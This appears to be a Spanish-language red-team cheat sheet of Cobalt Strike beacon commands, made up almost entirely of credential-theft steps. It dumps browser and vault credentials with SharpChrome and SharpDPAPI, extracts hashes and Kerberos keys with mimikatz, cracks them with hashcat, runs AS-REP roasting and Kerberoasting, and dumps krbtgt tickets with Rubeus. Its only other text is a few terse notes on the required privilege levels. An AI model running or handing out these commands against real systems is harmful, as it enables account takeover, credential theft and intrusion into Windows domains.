- Requiere Medium Level Beacon
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpChrome\bin\Release\SharpChrome.exe logins- Requiere Medium Level Beacon, y acceso a la cuenta del usuario que queremos sacar las credenciales.
Enumeramos si hay credenciales guardadas
beacon> run vaultcmd /listcreds:"Windows Credentials" /allDesciframos con SharpDPAPI
beacon> execute-assembly C:\Tools\SharpDPAPI\SharpDPAPI\bin\Release\SharpDPAPI.exe credentials /rpcSacar el NTLM -> Pass The Hash Debes tener high beacon y luego usar el ! para suplantar el ID de SYSTEM
beacon> mimikatz sekurlsa::logonpasswordsPS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 1000 .\ntlm.hash .\example.dict -r .\rules\dive.ruleSacar AES256 kerberos KEY -> el des_cbc_md4 mas largo.
beacon> mimikatz sekurlsa::ekeysPS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 28900 .\sha256.hash .\example.dict -r .\rules\dive.rulebeacon> mimikatz !lsadump::cachePS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 2100 .\mscachev2.hash .\example.dict -r .\rules\dive.ruleAS-REP Roasting
Buscar cuentas
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asreproast /format:hashcat /nowrapPS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 18200 .\asrep.hash .\example.dict -r .\rules\dive.ruleKerberoasting
Buscar cuentas
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe kerberoast /format:hashcat /simplePS C:\Tools\hashcat> .\hashcat.exe -a 0 -m 13100 .\kerb.hash .\example.dict -r .\rules\dive.ruleExtraer Tickets
Debes tener High Level integrity
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x35b1d /service:krbtgt /nowrap